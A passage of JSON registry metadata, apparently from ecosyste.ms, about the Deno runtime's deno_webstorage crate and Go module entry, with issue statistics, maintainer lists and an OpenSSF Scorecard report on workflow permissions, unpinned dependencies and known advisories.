ecosyste.ms/usage/cargo/deno_webstorage","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_webstorage/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webstorage/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:39.943Z","updated_at":"2022-11-07T18:29:39.943Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:29.748Z","updated_at":"2023-07-18T22:41:29.748Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":3689139,"name":"github.com/denoland/deno","ecosystem":"go","description":"","homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"github.com/denoland","versions_count":396,"first_release_published_at":"2018-08-17T16:58:58.000Z","latest_release_published_at":"2026-08-27T15:15:58.000Z","latest_release_number":"v2.9.6+incompatible","last_synced_at":"2026-09-07T23:07:12.340Z","created_at":"2022-04-11T11:22:57.045Z","updated_at":"2026-09-07T23:07:12.340Z","registry_url":"https://pkg.go.dev/github.com/denoland/deno","install_command":"go get github.com/denoland/deno","documentation_url":"https://pkg.go.dev/github.com/denoland/deno#section-documentation","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed 